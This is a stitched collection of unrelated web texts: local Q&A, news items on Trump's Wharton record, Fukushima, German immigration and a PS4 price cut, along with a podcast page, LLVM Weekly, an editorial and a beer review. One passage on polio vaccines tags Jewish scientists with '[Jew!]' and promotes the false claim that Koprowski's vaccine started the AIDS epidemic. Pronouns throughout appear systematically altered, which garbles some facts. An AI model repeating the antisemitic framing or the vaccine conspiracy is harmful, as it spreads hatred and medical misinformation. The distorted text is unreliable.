Well, Illuminati fans, I'm sorry to report that the Thruway Authority as Orwellian villain theory just doesn't hold up. Yeah, I know, it all has to be true because you read it in an email, right? No, it isn't true, and the New York State Thruway Authority has heard the rumor so many times they even issued a statement saying that “the authority and state police do not use E-ZPass to enforce vehicle and traffic law.” The Thruway Authority also pointed out that it doesn't even have the authority to issue speeding tickets, since state law requires an observation or radar by a police officer to charge someone with speeding. But what about those letters that people have claimed to have received? Those are caution letters for having traveled too fast through the toll area.
Q: There have been so many stories about Pete Seeger since their passing. I heard something about them building the chimney of their house with rocks that were thrown at them during a protest. What can you tell me about that?
—Ron Deepe, Ardsley
A: One of our county's darkest moments came during the Peekskill Riots in 1949. African-American singer and civil-rights leader Paul Robeson was scheduled to perform in Peekskill. At the time, they were labeled not only a civil-rights leader, but also a communist, a rabble-rouser, and a danger to the American way of life. On August 27, the Ku Klux Klan fueled a mob that rioted and prevented Robeson from performing. Crosses were burned, people were beaten, and, in general, it was very ugly stuff. The concert was canceled.
A rescheduled show was planned, and artists like Woody Guthrie and Pete Seeger performed with Robeson to show their support for them and the causes they represented. Afterwards, another angry mob formed and attacked a car with Guthrie and Seeger in it. The rioters smashed all of the car's windows with rocks and continued to hurl them at the folk singers as Guthrie and Seeger sped away.
As was Pete Seeger's way, they got the last laugh. They reported that they collected the rocks from the back seat and added them to a chimney they were building on their house so they would always remember that night, Paul Robeson, and the Peekskill Riots.
Q: I was watching an old movie on cable last night called It Could Happen to You. Supposedly, a diner customer who just bought a lottery ticket fails to tip a waiter but promises to give them half of their winnings if they get lucky. A friend told me it is a true story and it happened in Westchester—what's the deal?
—Heather Riggi, White Plains
A: Sal's Pizzeria in Yonkers is known for more than its exquisite thin slices and eggplant parm sandwiches.
Robert Cunningham, a police detective in Dobbs Ferry, was a regular there, and Phyllis Penzo, who had worked at Sal's for more than 20 years, often waited on him. In 1984, Cunningham offered Penzo the chance to go half-in on a lottery ticket, promising them half the winnings if the ticket was a winner instead of their normal gratuity. And, lo and behold, when their $6 million ticket hit, the man kept their word. By the way, $3 million is significantly more than the 20-percent tip on the $15 bill Penzo was due.
The rest of the Nicolas Cage movie doesn't quite hold up. Cunningham and Penzo didn't fall in love and get married and run off together. They stayed married to their spouses and kept in touch—the least you could expect from the person with whom you split $6 million.
Have a question about the county? Email edit@westchestermagazine.com. Subject line: Any Questions?
A new report from the think tank British Future (pdf) looks at what it means to be British. Among a wealth of fascinating data, the poll conducted for the organisation finds that just 7% of Britons agree that being Christian is an important attribute for being British.
This compares with 50% who say that Britishness equates with respect for people's right to free speech — even if you don't agree with them — 46% with respect for the law, 41% with speaking English, 38% with treating men and women equally, 29% with respect for all ethnic backgrounds, 26% with respect for all faiths, 26% with being born here, and 21% with voting in elections. Only being white (6%) scores lower than being Christian. Demographically, the number citing being Christian peaks among the over-45s (11%), those with no formal educational qualifications (11%), and readers of right wing newspapers such as the Daily Mail and Daily Express (12%).
In answer to another question, tensions between different religions are (at 26%) the sixth most cited (of ten) causes of division in British society, after tensions between immigrants and people born in Britain (57%), between tax payers and welfare claimants (47%), between rich and poor (35%), between different ethnicities (33%), and between tax payers and tax avoiders (32%). However, tensions between different religions are ranked lower (seventh, at 16%) as a cause of division in the respondent's local area. All percentages are the sums of those ranking each cause in first, second or third position.
As you know, I have been traveling to many countries to participate in tournaments. However, since accommodations were provided just for the tournament days, I didn't actually have time to sightsee. Of course it was possible to go around if I was defeated during the early stages of the tournaments, but I didn't want that happen. Also, because players spent most of their time focusing and preparing for their matches, they didn't have enough time to really enjoy themselves. Most players, including me, literally flew to a new country, played matches, and came back home. Therefore, players usually don't get much of an impression of countries we compete in.
I was expecting that it would be the same case at this tournament also. IEM World Championship is one of the biggest tournaments of the year, so I had to focus solely on my matches. There was no thought in my brain to sightsee, when the stakes are that high It's hard to think about anything else. The only thing I heard about Katowice was that it's a small city and there would be nothing much do to there even if I did have the time.
As soon as I saw the venue, I realized I was totally wrong. It was the biggest stage I had ever played on. In fact, the first time I saw the venue it wasn't full of spectators, but imagining it full later on was enough to become thrilled. Despite an unpleasant incident that happened at my first match, I still felt pleased and looked forward to playing on the stage again. It was still impressive to see the venue on the second day of the tournament. Fortunately, I had a chance to play two complete matches on the stage. I lost my semifinal match but the fans' chanted for me, even though I lost those kinds of moments are unforgettable.
The fans in Poland were so passionate and it really impressed me. Most fans I met wanted to get my autograph or take pictures and I felt bad because I couldn't do it for everyone that asked. As I mentioned before, since I like to play on stages with a big crowd, I was enjoying the time with the fans and just competing in front of them was fulfilling. Seeing their reactions after getting my autograph or picture made me enjoy the event even more. In Poland, what stood out the most for me was that I could sense fans were more earnest. I tried to buy some food near the convention area, but I had trouble communicating. One of my fans saw, and they stepped in and made things much easier. The local restaurant I went to on the last day was also great. My manager usually asks some awkward questions about the food and they did it here too. Luckily, we had a truly kind waiter, and we happily enjoyed our dinner. Poland is one of the countries I want to visit again. Hopefully I can see everyone again next year!
Comments
comments
Donald Trump rarely resists an opportunity to remind people that he's a "smart person,", an estimation they frequently flaunt alongside reminders that they graduated from the University of Pennsylvania, an Ivy League institution. In particular, Trump has boasted of their matriculation at Wharton, the university's hyper-competitive business school. As it turns out, however, Trump's days of higher education may not have been as distinguished as they have allowed people to believe. While media outlets have spent years repeating the claim (neither made by nor denied by Trump himself) that Trump graduated at the top of the class, archives obtained by a Penn student newspaper dispute the possibility.
As reported by The Daily Pennsylvanian, a list of the 56 students to make the Wharton Dean's List in 1968 (Trump's graduating year) did not include Trump. Given a reported 366 members of Wharton's 1968 graduating class, Trump's absence from the Dean's List suggests that their performance did not rank them among the top 15% of their peers. There is also no evidence that Trump graduated with academic honors, as the 1968 commencement program lists Donald Trump as a graduate but not as an honoree recipient.
Trump certainly has a complicated relationship with their alma mater, which they attended after transferring from Fordham University. The president has bragged frequently about their time at the school, and their children Ivanka, Donald Jr., and Tiffany all followed their example to attend. But the love Penn feels for them in return is in question, as many students at the college have organized against them since the election.
Penn does not release academic records of alumni beyond basic facts of graduation date, degree, and major, so, absent of involvement from Trump's newly reviled leakers, it is unlikely that the specific details of Trump's student days will ever be known.
Related: 10 Things to Know About Ivanka Trump
It's happened: sony has cut the base price of the PS4 to $349.99 in North America. That gives the PS4 two stellar years at its initial price point of $399.99, even one with its chief competition sitting at $349.99. We saw this in a leak from Target earlier this week, but now its official. This brings the PS4 into price parity with the Xbox One, which is sure to give Microsoft a headache even as it releases Halo 5: Guardians, the biggest exclusive it has in its wheelhouse. The price drop affects all PS4 bundles, even those not priced at $399.99: The PS blog has a handy chart to see where your most coveted bundle falls in the new pricing scheme. Here's what Sony has to say:
"Since the launch of PS4, we have been thrilled with the amount of gamers jumping into the world of PlayStation for the first time. If you haven't made the jump yet, and you're starting early on your holiday wish list, I have good news – we're dropping the price of the PlayStation 4 system in the U.S. and Canada. Starting tomorrow, October 9, you'll be able to pick up PS4 starting at the new price of $349.99 USD / $429.99 CAD (MSRP). Our goal at PlayStation has always been to provide the best gameplay experiences at the best value, and we feel this new compelling price will open the doors to even more gamers that have yet to purchase a system."
It's somewhat interesting wording: very specifically targeted at first time gamers, not necessarily PS3 owners who have yet to upgrade. Regardless, 2015 is poised to be the biggest year yet for both PS4 and Xbox One, something that this price drop is sure to only encourage. Both machines have deep libraries for the first time in their lifespans, and that's before the massive spate of releases coming in October and November. I had a ton of non-gaming friends that poured their lives into Skyrim: we'll see if the same holds true for Fallout 4.
Ollie Barder reports an uptick in PS4 sales in Japan following a price cut -- we'll see what happens here.
Producer Adi Shankar ( Dredd , The Grey ) announced on Wednesday that they are working on an animated mini-series based on Konami's Castlevania game series. Shankar also announced that they are working with Fred Seibert and Kevin Kolde of Frederator Studios ( Adventure Time , The Fairly OddParents ), as Frederator Studios had acquired the rights to adapt the series.
Shankar told the Collider website that they are basing the series' story on the Castlevania III: Dracula's Curse game. Shankar states that the series will be "dark, [and] satirical," influenced by anime such as Akira , Ghost in the Shell , and Ninja Scroll , as well as the American animated series Young Justice .
Shankar further stated that the series would contain "Easter eggs" for fans of the game, and the musical score will "use the heavy metal electro guitar vibe found in the early games."
Konami released the Castlevania III: Dracula's Curse game on the NES/Famicom in Japan in 1989, and in North America in 1990. The game is set in 1476, and Dracula has Europe under their grip. Trevor Belmont journeys in an attempt to defeat Dracula, and enlists the sorceress Sypha Belnades, the pirate Grant Danasty, and Dracula's own half-vampire son, Alucard.
[Via Dark Horizons]
Thanks to Daniel Zelter for the news tip
Stanley McChrystal (@stanmcchrystal) retired from the U.S. Army as a four-star general after more than 34 years of service. Former Defense Secretary Robert Gates described McChrystal as “perhaps the finest warrior and leader of men in combat I ever met.”
From 2003 to 2008, McChrystal served as Commander of Joint Special Operations Command (JSOC), where they were credited with the death of Abu Musab al-Zarqawi, leader of Al-Qaeda in Iraq.
Their last assignment was as the commander of all American and coalition forces in Afghanistan.  They are a senior fellow at Yale University's Jackson Institute for Global Affairs and the co-founder of McChrystal Group, a leadership consulting firm.
In this episode, we discuss everything imaginable, including:
– Why they only eats one meal per day, and what they eats
– Their exact exercise regimen
– Tactical and psychological lessons of combat
– Self-talk used before and after difficult missions
– The development of mental toughness
– Favorite books, documentaries, etc.
– And much, much more
Chris Fussell (@FussellChris), who also joins the conversation, is a former U.S. Navy SEAL officer, former Aide-de-Camp for General McChrystal, and a current senior executive at CrossLead.
#86: General Stan McChrystal on Eating One Meal Per Day, Special Ops, and Mental Toughness https://rss.art19.com/episodes/bb75d2ca-0524-4122-9536-d28269a49f96.mp3 Download
Want to hear a podcast related to personal security in the digital age? — Listen to my conversation with Marc Goodman, a former FBI futurist focused on defeating high-tech crime. Learn how not to be an easy target — stream below or right-click here to download:
Ep 48: Marc Goodman, FBI Futurist, on High-Tech Crime and How to Protect Yourself https://rss.art19.com/episodes/7f1ea57b-6b40-4740-be4c-d3f64b1ce466.mp3 Download
Also, don't miss my interview with hacker Samy Kamkar. — Listen to our conversation on conquering online dating, opening locked cars, and their story of accidentally taking down MySpace with the fastest-growing “worm” of all time (stream below or right-click here to download):
#74: How a Computer Hacker Optimizes Online Dating, Opens Locked Cars, and Hijacks Drones https://rss.art19.com/episodes/e6c1ea37-f90c-4fcf-a145-9f465b4641c1.mp3 Download
This episode is sponsored by Athletic Greens. I get asked all the time, “If you could only use one supplement, what would it be?” My answer is, inevitably, Athletic Greens. It is my all-in-one nutritional insurance. I recommended it in the The 4-Hour Body and did not get paid to do so. Get 50% off your order at Athletic Greens.com/Tim
This podcast is also brought to you by 99Designs, the world's largest marketplace of graphic designers. Did you know I used 99Designs to rapid prototype the cover for The 4-Hour Body? Here are some of the impressive results. Click this link and get a free $99 upgrade. Give it a test run..
QUESTION(S) OF THE DAY: In your opinion, what makes a good leader, and who exemplifies those qualities? Please share in the comments.
Scroll below for links and show notes…
Enjoy!
Selected Links from the Episode
Website | Twitter | Facebook | LinkedIn
Show Notes
Why eat one meal per day? [5:36]
Understanding SOCOM and JSOC [9:21]
On the role of an aide-de-camp (ADC) [13:21]
How Chris Fussell reduced friction as Stanley McChrystal's ADC [15:46]
Stanley McChrystal's daily exercise habits and why they're important [19:36]
Most gifted books for those entering combat situations [28:21]
On West Point: Slugs and Area Tours [31:01]
On mischief in school and success in the Army [34:11]
How peer reviews worked at West Point [35:11]
On vetting applicants for important positions [38:11]
Stanley McChrystal's selection criteria for candidates [47:11]
Why Chris Fussell left the service early and defining “intelligence fusion cells” [53:21]
The most underrated military leaders? [57:36]
Fanatical audiobook listening habits and book selection [59:36]
Why Stanley McChrystal personally attended battlefield operations [1:06:21]
Hopeless dilemmas and managing self-talk in high-pressure environments [1:14:31]
Who comes to mind when Chris Fussell thinks of “successful”? [1:20:21]
Common organizational misperceptions between civilians and military personnel [1:24:21]
Meditation practices [1:29:11]
The “Red Team” concept in the military [1:31:11]
What are good ways for the average citizens to practice military strategy? Games? Activities? [1:36:06]
Stanley McChrystal on chess vs. backgammon and the complexities of modern day leadership [1:38:51]
What surprised Stanley McChrystal about Yale University [1:41:21]
The story behind Team of Teams and modern leadership challenges [1:44:01]
Stanley McChrystal's advice to their thirty-year old self [1:55:06]
People Mentioned
Posted on: July 5, 2015.
Share this: Facebook
Twitter
Email
Reddit
Print
Please check out Tribe of Mentors, my newest book, which shares short, tactical life advice from 100+ world-class performers. Many of the world's most famous entrepreneurs, athletes, investors, poker players, and artists are part of the book. The tips and strategies in Tribe of Mentors has already changed my life, and I hope the same for you. Click here for a sample chapter and full details. Roughly 90% of the guests have never appeared on my podcast.
Who was interviewed? Here's a very partial list: tech icons (founders of Facebook, Twitter, LinkedIn, Craigslist, Pinterest, Spotify, Salesforce, Dropbox, and more), Jimmy Fallon, Arianna Huffington, Brandon Stanton (Humans of New York), Lord Rabbi Jonathan Sacks, Ayaan Hirsi Ali, Ben Stiller, Maurice Ashley (first African-American Grandmaster of chess), Brené Brown (researcher and bestselling author), Rick Rubin (legendary music producer), Temple Grandin (animal behavior expert and autism activist), Franklin Leonard (The Black List), Dara Torres (12-time Olympic medalist in swimming), David Lynch (director), Kelly Slater (surfing legend), Bozoma Saint John (Beats/Apple/Uber), Lewis Cantley (famed cancer researcher), Maria Sharapova, Chris Anderson (curator of TED), Terry Crews, Greg Norman (golf icon), Vitalik Buterin (creator of Ethereum), and nearly 100 more. Check it all out by clicking here.
As German cities struggle with the effects of rising immigration, a committee appointed by the Merkel government released an interim report recommending limits to residency rights for job-seekers from EU member states. EURACTIV Germany reports.
Immigration from other European states to Germany has increased in recent years, according to a report approved by the German government on Wednesday (26 March).
“That is good news for our country”, explained Federal Minister of Internal Affairs Thomas de Maizière at the presentation of the interim report in Berlin.
The document was tabled by a special committee assigned by the German government to assess legal matters and challenges concerning immigrants from within the EU.
Although immigrants contribute to prosperity and development in Germany, Maizière said, “on the other hand, we should not turn a blind eye to the fact that there are also problems related to immigration.”
In many municipalities, the trend has intensified social problems and placed a growing burden on community service systems. Areas like schooling, housing, sheltering the homeless and healthcare are particularly affected.
Information from the German Federal Statistical Office shows that most immigrants come from Poland. Romania, Hungary and Bulgaria follow by a significant margin in second, in third and fourth place respectively. Immigration from Greece, Italy, Spain and Portugal has also increased.
Nevertheless, immigrants from Bulgaria and Romania have been the subject of public debate, ever since the EU extended freedom of labour movement to these two member states.
“From a national perspective, the number of immigrants from Bulgaria and Romania is reasonable and manageable, but regionally it is alarming,” the internal affairs minister said, adding: “It is right for us to confront this now, so the Federal Republic does not sustain significant damage.”
The committee also proposed providing communities with €200 million in financial assistance over four years to help them deal with migration. The committee dealt primarily with the situation in municipalities hosting a disproportionately high number of immigrants from EU countries. Such municipalities lack apartments and sufficient housing facilities for the homeless.
But shortages in education for immigrants are also a significant problem. In this case, it is difficult to integrate them through training programmes and employment. Children do not attend school because they lack sufficient German language skills. Many immigrants do not have health insurance, but require urgent medical care.
The state secretarial committee proposed various measures to tackle the misuse of free movement rights. Re-entry restrictions are planned.
Further restrictions have also been proposed regarding the right of residence while searching for a job. Time limits of three and six months are being considered, the interim report said.
The committee hopes to cut-down on bogus self-employment and moonlighting through various changes to commercial law. Legal adjustments in family services and child benefits seek to impede potential abuse.
The maximum level of exposure for workers is 250 millisieverts for the duration of their work at the plant [Reuters]
A worker at Japan's tsunami-crippled Fukushima Daiichi nuclear power plant has died, plant operator Tokyo Electric Power Co said, bringing the death toll at the complex to three since a massive earthquake and tsunami in March.
The cause of the death was unknown. The man, in their 60s, was employed by one of Tokyo Electric's contractors and started working at the plant on Friday.
They were exposed to 0.17 millisieverts of radiation on Saturday, Tokyo Electric said.
The Japanese government's maximum level of exposure for male workers at the plant is 250 millisieverts for the duration of the effort to bring it under control.
The worker fell ill 50 minutes after starting work on Friday evening and was brought to the plant's medical room unconscious. They were later moved to a nearby hospital and confirmed dead, a Tokyo Electric spokesperson said.
Working conditions at the plant are harsh. Goshi Hosono, a special adviser to Prime Minister Naoto Kan and a ruling Democratic Party lawmaker, voiced concerns about the working environment at the Fukushima complex on Wednesday.
"I would like to spend my energy to improve working conditions. Many people told us working environment (at the plant) is way too bad," Hosono told a news conference.
The magnitude 9.0 earthquake and tsunami on March 11 triggered cooling system malfunctions at the plant, and caused radiation to leak into the atmosphere and the ocean.
Engineers are still struggling to bring the plant under control. Two Tokyo Electric employees went missing while patrolling the plant soon after the quake and were later found dead.
LLVM Weekly - #135, Aug 1st 2016
Welcome to the one hundred and thirty-fifth issue of LLVM Weekly, a weekly newsletter (published every Monday) covering developments in LLVM, Clang, and related projects. LLVM Weekly is brought to you by Alex Bradbury. Subscribe to future issues at http://llvmweekly.org and pass it on to anyone else you think may be interested. Please send any tips or feedback to asb@asbradbury.org, or @llvmweekly or @asbradbury on Twitter.
News and articles from around the web
LLVM/Clang 3.9.0-rc1 has been tagged. It's time to get testing.
Swift 3 is nearing completion and Chris Lattner has shared some thoughts looking ahead to Swift 4.
The first LLVM Cauldron will be held on September 8th in Hebden Bridge, UK. Registration to attend is open, and you have a week to submit your talks. Also consider the 2016 US LLVM Developers' Meeting, to be held November 3rd-4th in San Jose, California.
On the mailing lists
Renato Golin has shared a proposed LLVM target acceptance policy.
The discussion about a potential move from SVN to Git continues with most of it focused on the pros and cons of a single monolothic repo for all LLVM subprojects. Mehdi Amini has really helpfully collected links to various workflows people have shared and other concrete reasoning for or against monorepos that people have shared. Chris Bieneman has shared their concerns about a monorepo and is keen to point out that lack of dissent in this particular thread doesn't mean consensus - as others have pointed out, the discussion has become rather too unwieldy for many people to follow.
Christopher Bergström is interested in organising an LLVM social in Asia and want to gauge interest.
Michael Lewis wonders if there's interested in generating PDB from LLVM-backed languages. The reason to ask is actually as he's done rather a lot of work on it for their own language and wonders if others may benefit. A number of responders suggest looking at the PDB writing support that is being done in-tree.
LLVM commits
A massive, target-independent MachinePipeliner pass has landed which implements Swing Modulo Scheduling. r277169.
bugpoint has been modified to use a simpler control-flow graph simplification routine that results in faster runtime and more minimal test cases. r277063.
llvm-cov learned to export coverage data to JSON. r276813.
GlobalISel now has an instruction selector. r276875.
Clang commits
A simple analyzer was added to detect copy and pasted code. r276782.
The web manual for Clang checker developers has been updated with a much expanded section on debugging. r277029.
Other project commits
Saturday, we saw a number of news reports on the interwebs about the murder of Delbert Belton, who fought at Okinawa, allegedly by two teenaged thugs.
From these reports, we learned that robbery is bad, murder is bad, elderly combat vets from WWII are good, and if President Obama had a son then that child would look like the teenagers who allegedly murdered one of the good guys.
However, I want to focus on a different aspect of this event based upon an Associated Press report, which the Washington Post published with the title “Veteran of battle for Okinawa in World War II beaten to death in random Spokane attack.” The report includes the sentence, “Police believe the two 16-year-old boys approached Belton in their car at random Wednesday night outside an Eagles Lodge as they were waiting for a friend.” Further, “Such random attacks are rare in Spokane …,” according to the police chief. Random, really?
Let us look at what random means based upon a selection of definitions from The Free Dictionary's page for random:
The American Heritage® Dictionary of the English Language, Fourth Edition
1. Having no specific pattern, purpose, or objective: random movements. See Synonyms at chance.
3. Of or relating to an event in which all outcomes are equally likely, as in the testing of a blood sample for the presence of a substance.
Collins English Dictionary – Complete and Unabridged
1. lacking any definite plan or prearranged order; haphazard a random selection
Random House Kernerman Webster's College Dictionary
1. occurring or done without definite aim, reason, or pattern: random examples.
2. Statistics. of or characterizing a process of selection in which each item of a set has an equal probability of being chosen.
Thesaurus
1. lacking any definite plan or order or purpose; governed by or depending on chance; “a random choice”; “bombs fell at random”; “random movements”
Random? Let us look at some of the facts from the Associated Press report and see if we can recognize a pattern and some cause-and-effect in this reported randomness:
The suspects are teenaged (16 years old) males.
The victim was elderly (88 years old) and physically small (5 foot).
The victim was alone at night in a publicly accessible place.
The attack was a beating (not gun).
Both suspects have past convictions for assault.
The police chief thinks the motive was robbery, but does not really care about the ideas that motivated the attackers.
Really, with those set of facts, the police chief considers this event to be random? Perhaps, if Spokane's Police Chief Frank Straub had a little bit of intellectual curiosity, then they could see patterns, purposes, and objectives to demonstrate that this outcome was not equally likely with all other possible outcomes. Further, given that the police chief claims that such attacks are rare, then how do they and the prosecutor's office account for the fact that these young suspects have been previously convicted for assault and were on the streets again allegedly robbing an old man? Is their answer really randomness?
What is the idea that these suspects hold that can bring order to the alleged randomness? Violence is practical. In this conclusion, these teenagers have been exceptionally attentive students to the example provided by our public schools, public officials, and the popular opinion of our culture.
These teenagers learned that they were subject to force compelling them to attend school under the dictates of a public officer, aka teacher, in a setting resembling a pre-prison program. Our President proposes that the law should be changed to compel students to remain in school until 18 years old for their own good; or, is that for the benefit of unionized teachers? Either way, the lesson is clear that others are to decide what is good for the teenagers, or someone else, and that that imposed judgment is to be implemented with threats, extortions, and force.
Through the subordination of civil society institutions and private property to the control of politicians and bureaucrats, these teenagers have learned that force is how adults deal with one another. You will not will self-sacrifice your interests to the will of the majority? No problem, the government will force you to comply.
Very easily and correctly we condemn these alleged murderers for their actions and the consequences of those actions. Are they just bad seeds? Were they not hugged enough by their fathers? Or, are they acting on the ideas they were taught by their teachers, their politicians, and their community? How many times was the victim robbed by their neighbors through governmental action before they were murdered allegedly by two boys?
Advertisements
Buy Photo Traffic bogs down at the south end of Mall Drive in this photo from Tuesday, Feb. 3, 2015. More vehicles should be expected soon with the St. George City Council approving a zone change Thursday that paves the way for a new Lin's grocery store and shopping center to move in on a nearby corner. (Photo: Chris Caldwell / The Spectrum & Daily News)Buy Photo
A new grocery store and shopping center could be moving in soon at the intersection of Mall Drive and 3000 East, just south of where a recently-built bridge has created a new traffic corridor connecting the formerly agricultural Washington Fields area to the rest of St. George.
The city council gave the nod Thursday to a zone change request on a 16-acre plot at the intersection's southwest corner, paving the way for a new Lin's Fresh Market and surrounding retail shops.
The parcel is part of a larger 106-acre property recently changed to higher-use designations on the city's general plan maps, with the new bridge and ongoing improvements along 3000 East turning the once-isolated fields into a high traffic area.
“Residential on that corner is not going to work,” City Manager Gary Esplin said. “Go out there every day and see what that traffic is like.”
Lin's would be the anchor tenant, with a 52,000 square foot building that would include a pharmacy, in-store bank and in-store Dairy Queen restaurant.
Another 75,000 square feet of commercial retail space is then planned to be built around the Lin's, with potential tenants including banks, restaurants, department stores, salons and fast food.
“We've watched this location for five or six years. We only had one problem, and that was the bridge,” said Steve Miner, representing the real estate arm for Associated Food Stores, Inc., which owns Lin's and a number of other popular grocery outlets.
Miner said the hope is to move forward quickly with construction, joking that they hoped to see the store “selling turkeys for Thanksgiving.”
Before construction, the city still needs to sign off on a development agreement. Only half of the acreage would be part of the first phase, with the grocery store and four smaller buildings included.
The submission included a traffic study that several improvements would be needed along Mall Drive and 3000 East. A new light at the intersection of the two roads is already in design, and the study projects 12,690 new vehicle trips per weekday by the time the development is fully built
A large drainage channel is planned to go in along the Mall Drive frontage, an area expected to include a city trail and landscaping once completed. Because of the additional setback from the road – some 90 feet – the developers requested more signage than is typically allowed, including one 40 foot tall sign.
The 106-acre development around it could eventually include retail and commercial businesses at the intersection, surrounded by professional office space to the north and medium-density residential development to the west, south and east, according to recent applications for changes to the city's general plan.
Representatives for the owner Suburban Land Reserve, Inc., the commercial real estate arm of The Church of Jesus Christ of Latter-day Saints, have indicated that the idea is to build something that fits in with the surrounding area.
Also on Thursday, the council:
•Approved a $107,600 bid for a professional services agreement to design and manage the construction of 12 new pickleball courts at the Little Valley Pickleball Court Complex, which would double the facility's capacity.
Anticipating a new revenue source mid-year when the city starts collecting its portion of a recently-passed sales tax increase tied to recreation and the arts, planners are hoping to design and build the new courts before the Huntsman World Senior Games in October.
•Approved a special event permit to allow a beer garden during a scheduled “Retrospect Rockfest” event slated at the Ridge Top Complex (formerly home to the St. George municipal airport) on May 8-9.
Follow David DeMille, @SpectrumDeMille.
Related stories:
New development coming on south Mall Drive
More development approved in east St. George
Long-awaited bridge connection opens
New bridge brings new development
Online
Get meeting minutes, agendas and more information on the St. George City Council at sgcity.org/citycouncil.
Read or Share this story: http://www.thespectrum.com/story/news/local/2015/03/05/shopping-center-lds-church-owned-land-gets-approval/24479979/
Provincial police in northern Ontario cancelled an Amber Alert for a two-year-old girl they say has been found safe.
Provincial police in northern Ontario have issued an Amber Alert for a two-year-old girl they say was abducted in Rainy River, near the Manitoba boundary.
The victim is identified as Eva Kaminski.
 They are described as white, 3 feet 2 inches tall, with blue eyes and long blonde hair.
They were last seen wearing pink penguin pyjamas.
Fort Francis OPP identified the suspect in the abduction as Brad Farand, a 36-year-old male described as white, 6 feet tall, 250 pounds with brown hair and eyes. They have forearm tattoos that say Nicole and Teagen.
Police say Farand is driving a 2012 Black Dodge Caravan with Ontario licence CBX-S626.
They were last seen travelling westbound on Highway 11 towards Emo, Ont.
Anyone with information is urged to call 911.
– See more at: http://www.timescolonist.com/newsalert-ontario-police-issue-amber-alert-in-relation-to-child-abduction-1.20103599#sthash.50t9weMg.dpuf
On April 12, 1955 Jonas Salk's [Jew!] polio vaccine was first licensed for public use in the U.S. In the years afterwards 90 million Americans were vaccinated in the largest mass vaccination campaign ever. Polio virtually disappeared from the continent and Jonas Salk became a hero.
But not long after, 260 children who were vaccinated with Salk's vaccine became sick. Eleven of them died. An investigation showed that some lots of the vaccine were defective and confidence in it was shaken.
Two scientific greats, Dr. Hilary Koprowski [Jew!], director of the Wistar Institute in Philadelphia, and Dr. Albert Sabin [Jew!], a physician at the Cincinnati Children's Hospital, raced to replace the Salk vaccine. Dr. Cecil Fox, a pathologist at the National Institute of Infectious Diseases remembers that it was an intense competition.
Both Sabin and Koprowski's vaccines were derived from monkey organs. They needed to test them in large, non-immunized population groups, no longer available in North America.
Sabin traveled to the U.S.S.R. and vaccinated more than 6 million people in Latvia, Estonia and Kazakhstan between 1958 and 1959. No AIDS cases emerged in the U.S.S.R. where Sabin did their testing.
Koprowski moved their study to the Belgian Congo which had one of Africa's more modern health care infrastructures at the time. Between 1956 and 1960 more than 1 million African people were ‘encouraged' to receive Koprowski's vaccine called CHAT.
Sabin analyzed Koprowski's vaccine in 1958 and found it be be ‘unstable and contaminated by an unknown virus'. They told Koprowski about their discovery and then went public with their findings.
Since first being broadcast in 2003 the Origins Of Aids has yet to be aired on UK television. Despite winning many awards and being hotly debated the reason is because of the barrage of legal assaults made on potential screeners by Dr Koprowski (and their legal network), who strongly denies causing the Aids epidemic during their 1950s trials of an experimental polio vaccine in Africa. Doc-Film-Net has also been threatened with more legal action for showing this important film than any other!
http://drey.orgfree.com/Political – Visit the Ocular Stream's political section, for dozens of hard-hitting documentaries and films, all packed with physical evidence and sworn testimony.
See also: Dr. Jonas Salk, inventor of polio vaccine, exposed as criminal-minded scientist who conducted illicit medical experiments on mental patients
Beer – #442 – Liberty – Yakima Monster
On a theme of big beers, or at the very least the APA style, the Liberty Yakima Monster. A beer I've been acused of avoiding. Which isn't true of course, but only because I thought I'd drunk it. We all know what thought did?
Brewed by Liberty Brewing Co in the style of the American Pale Ale and they are in Auckland, New Zealand
Served as a 500ml bottle that is 6% ABV, either 45 or 50 IBU things (Iike an IPA) and 180 calories a serve of 355 ml so this would be 220 ish for the bottle. 2.3 standard drink units too.
Get those images of Godzilla and Mothra out of your head! I know you were thing it, but this beer has nothing to do with Japan whatsoever. Yakima is actually a region in the state of Washington USA where some of Joseph Wood's favorite hops are grown. This monster of a Pale Ale showcases several of those hops.
“It's a easy drinking beer, flavorsome enough for your father 'n law to exclaim “wow – that's fruity!” yet complex enough for any green blooded hop-head to appreciate.” – Joseph Wood, Liberty Brewer. Gold medal 2012 Brew NZ Awards
Like I said I've been avoiding this for a while, but let's go…
But before that, the artwork reminded me of “Tales from the Crypt” cover artwork, or any other of those 70's mags, which used to feature various monsters, ghouls and such like and so forth.
I'm not sure that my afternoon was best served with high ABV beers, as this will lead to tears before bedtime, so this is a post I prepared earlier….
But I press on, after all the sun is shining and all that I have to think about is not incinerating the meat on the barbecue later, right ?
Much more yeast in the aroma on opening, so much less hop grassiness.
Much more golden and pale on the pour and which a gigantic headsworth that lucky for me didn't over spill. Looks nice though pale yellow gold but slightly cloudy. Certainly much less orange than the previous ITI and NUI.
Nice aroma bloom in the glass though.
Now I know not all APA beers are the same, but this is at real odds with the last couple I had. Really at odds.
Anyway back to this. It's all of it's bitterness, i.e. not much. Having said that there really is a steep curve of grassiness that is really low and bitter through this.
Which, if it's not confusing, is all of the profile, there isn't anything sweet or soft in this, and which then leads me to think that this is sour bitter because that's the style, and I've been lead astray.
I'm not sure that this is “easy drinking” though, it's a bit edgy and in need of other assistance by way of external food or input. Should have brought some crisps/chips.
Getting to the point then, based on the last couple of APA beers this is an outlier, and it is interesting to note the totally different profiles that this has, and you couldn't pick a more polar opposite thing in tastes. This won medals in 2012, the bar can't have moved that much.
Then. This has a bit more overall roundness in it as a beer. There is more middle in this, the profile is flatter, so no shocks up front, or dryness in the end. Don't mistake that for no bitterness, because there is, and there is dryness at the end, but it's not the distracting and tongue clucking type. Thereby hangs a tale. Because this is actually all things said and done a bit good as a beer.
The lower IBU doesn't seem to count for much as it really is pervasive and present, and there isn't a softer middle to muddle it, you get a rounded drink that is despite it's contrary nature as to quaffability a bit quaffable. You just get used to it.
Again I'm reminded that I had this on tap out and about at the excellent Sky Sports Grill bar in the viaduct Auckland, no so long ago, clearly under peer pressure, where I rated it a 4 from 5 on untappd. or an 8 form 10 arbitrary things.
The pdubyah-o-meter rates this as 8 a of its things from the thing. In spite of myself and because you can lead or follow on the rules thing, I'm not sure I can rate this as a beer better than “very good”. It isn't outstanding or jaw dropping. It's just an accomplished beer of some merit.
The double dip review
Am I enjoying it? No but yeah, but no but yeah Would I have another? yeah but no….. of course, depends on if there is an offset food. Would I share with a friend on a porch and set the world to rights? This is a beer that you get out in the middle of thing, it's not they lead or the end. If it was a proper porch conversation then yes, if it was Sunday Arvo quarterback then no.
I found myself listening to a really good music album, a debut album, but UB40, called Signing Off, This one track “Tyler”
https://www.youtube.com/watch?v=YAQ573AFp60
